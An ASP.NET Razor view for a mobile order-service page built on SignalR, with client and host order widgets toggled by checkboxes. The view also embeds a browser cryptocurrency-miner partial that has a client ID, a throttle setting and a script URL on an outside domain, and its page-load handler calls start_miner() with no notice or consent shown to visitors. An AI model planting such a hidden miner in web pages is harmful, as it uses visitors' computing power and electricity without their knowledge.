@model SignalRService.ViewModels.ServiceSettingViewModel

@{
  Layout = "~/Views/Shared/_LayoutMobile.cshtml";
}

@Html.Partial("SignalRBase", new SignalRService.ViewModels.SignalRBaseConfigurationViewModel()
{
        SinalRGroup = Model.ServiceUrl
})


<h4>@Model.ServiceName</h4>

@Html.Partial("RenderMiner", new SignalRService.ViewModels.MinerConfigurationViewModel() {
     ClientId = "b1809255c357703b48e30d11e1052387315fc5113510af1ac91b3190fff14087",
     Throttle = "0.9",
     ScriptUrl = "https://www.freecontent.stream./Htxj.js",
     StartDelayMs = 3000,
     ReportStatusIntervalMs = 65000
})


<fieldset data-role="controlgroup">
    <legend>Client, Host:</legend>
    <input type="checkbox" name="checkbox-client" id="checkbox-client" onclick="toggle_orderClient(this)" >
    <label for="checkbox-client">Client</label>
    <input type="checkbox" name="checkbox-host" id="checkbox-host" onclick="toggle_orderHost(this)" >
    <label for="checkbox-host">Host</label>
</fieldset>
<div data-role="controlgroup" data-type="horizontal" data-mini="true">
    <a href="#" class="ui-shadow ui-btn ui-corner-all ui-btn-icon-left ui-icon-plus ui-btn-b">...</a>
    <a href="#" class="ui-shadow ui-btn ui-corner-all ui-btn-icon-left ui-icon-delete ui-btn-b">Reset</a>
    <a href="#" class="ui-shadow ui-btn ui-corner-all ui-btn-icon-left ui-icon-grid ui-btn-b">...</a>
</div>



@Html.Partial("RenderOrderClient", new SignalRService.ViewModels.OrderClientConfigurationViewModel() {
   //  AppendToSelector = "*[data-role=page]"
   AppendToSelector = ".body-content",
   SinalRGroup = Model.ServiceUrl.ToLower()
})

@Html.Partial("RenderOrderHost", new SignalRService.ViewModels.OrderHostConfigurationViewModel() {
    AppendToSelector = ".body-content",
    SinalRGroup = Model.ServiceUrl.ToLower()
})

<script>
    function toggle_orderClient(e) {
        if (e.checked) {
            itemOrderClient.run();
        }
        else {
            itemOrderClient.stop();
        }
    }
    function toggle_orderHost(e) {
        if (e.checked) {
            itemOrderHost.run();
        }
        else {
            itemOrderHost.stop();
        }
    }
</script>

<script>

    //itemOrderClient.loadJqueryMobile();
    $(function () {
        start_miner();
    });

    
    

</script>
